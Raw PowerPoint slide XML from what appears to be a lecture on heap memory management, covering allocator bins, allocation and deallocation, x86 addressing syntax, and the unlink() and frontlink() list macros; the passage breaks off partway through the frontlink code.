          <p:cNvPr id="1083418" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2571750"/>
            <a:ext cx="1371600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>User pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083419" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4972050"/>
            <a:ext cx="1371600" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>User pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="877351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9604" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bin Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049605" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Available chunks are maintained in bins, which are doubly-linked lists of free chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bins are organized by sizes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chunks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are maintained in decreasing sorted order by size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1049606" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="814553" y="4700120"/>
            <a:ext cx="6120523" cy="1721644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1876452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3700" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Allocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053701" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of corresponding bin is scanned (starting backwards)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When chunk of exactly correct size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is found (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>chunk size is equal or bigger by not more than 16 bytes than the requested size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), it is returned</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most-recent remainder of split is used (when large enough)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Split it if it is too big, return it when size is exact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other bins are scanned in increasing order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return chunk of exact size, split one that is too big</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2022058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5748" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Deallocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1055749" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>When the chunk to be freed borders the wilderness chunk, it is consolidated into it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If the chunk before the one to be freed is unallocated, it is consolidated into a single large chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If the chunk after the one to be freed is unallocated, it is consolidated into a single large chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Consolidation of chunks involves operating on the bin, removing the old chunk and adding the consolidated chunk to a new bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="738068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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Addressing Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memory access is composed of width, base, index, scale, and displacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Base: starting address of reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Index: offset from base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scale: Constant multiplier of index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Displacement: Constant base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Width: (address suffix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>size of reference (b: byte, s: short, w: word, l: long, q: quad)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Address = base + index*scale + displacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>displacement(base, index, scale)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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-0x20(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 4), %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73693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0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0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0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0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0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0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0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06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06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1069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106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7796" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List Handling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1057797" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When chunks are handled, their entries have to be taken off or inserted into the corresponding lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The macro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is responsible for removing entries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>extract from the list the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>entry P with its pointers FD and BK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink(P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, BK, FD) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>     		  BK = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	     	  FD = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>     		  FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	     	  BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = FD; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1502593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9844" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List Handling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059845" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The macro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is responsible for inserting entries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is used to insert entry P with its pointers FD and BK into bin IDX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(A, P, S, IDX, BK, FD) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  IDX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bin_index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(S); // Finds the index of a bin given the chunk size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  BK = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bin_at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(A, IDX); // Extract head pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  FD = BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (FD == BK) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mark_binblock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(A, IDX); // Mark bin as not empty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  else{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    while (FD != BK &amp;&amp; S &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>chunksize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(FD) ){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      FD = FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
